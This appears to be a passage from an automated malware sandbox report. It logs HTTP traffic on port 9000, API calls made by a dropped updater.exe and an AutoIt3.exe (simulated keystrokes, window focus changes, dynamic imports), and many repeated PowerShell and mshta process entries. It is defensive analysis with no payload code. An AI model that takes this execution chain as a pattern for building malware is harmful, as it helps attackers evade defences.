Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 50086 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 50098 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 50101 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 50127 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 50133 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50133
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50134
Source: unknown	Network traffic detected: HTTP traffic on port 50135 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50135
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50136
Source: unknown	Network traffic detected: HTTP traffic on port 50137 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50137
Source: unknown	Network traffic detected: HTTP traffic on port 50138 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50138
Source: unknown	Network traffic detected: HTTP traffic on port 50139 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50139
Source: unknown	Network traffic detected: HTTP traffic on port 50140 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50140
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50141
Source: unknown	Network traffic detected: HTTP traffic on port 50142 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50142

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004E59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	11_2_004E59B3
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_00475EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	11_2_00475EDA
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_00A059B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	14_2_00A059B3
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_00995EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	14_2_00995EDA

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004833B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

11_2_004833B7

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
